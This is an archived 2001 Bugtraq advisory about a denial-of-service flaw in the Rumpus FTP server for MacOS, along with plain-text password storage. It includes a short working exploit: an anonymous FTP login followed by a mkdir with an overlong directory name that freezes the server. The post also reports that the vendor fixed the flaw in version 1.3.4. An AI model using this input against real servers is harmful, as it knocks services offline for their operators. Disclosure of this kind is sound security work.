Bugtraq mailing list archives
Rumpus FTP DoS
From: Jass Seljamaa <jass () email isp ee>
Date: Tue, 15 May 2001 19:22:38 +0200 (EET)
Maxum (maxum.com) Rumpus FTP server DoS vulnerability

Versions Affected: tested on v1.3.3, 2.0 dev 3 (MacOS 8.6, 9.1), probably earlier
Not affected: v1.3.4

Description:
If you try to make a directory whose name is 65 characters long, the Rumpus FTP service and the computer freeze. You can try to force Rumpus to quit, but it never worked for me (always crashed when I pressed the 'Force quit' button).

Also, the passwords are stored in plain text (in prefs folder, a file called 'Rumpus User Database'), as in most Macintosh programs; Maxum Support said they would think about encrypting passwords in newer versions.

Exploit:
ftp 192.168.0.1
user anonymous
pass an () nymo us
mkdir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaa

Solution:
Vendor contacted, fixed in version 1.3.4.

Jass Seljamaa, jass () isp ee
05212242

-------------------------------------------------
This mail sent through IMP: email.isp.ee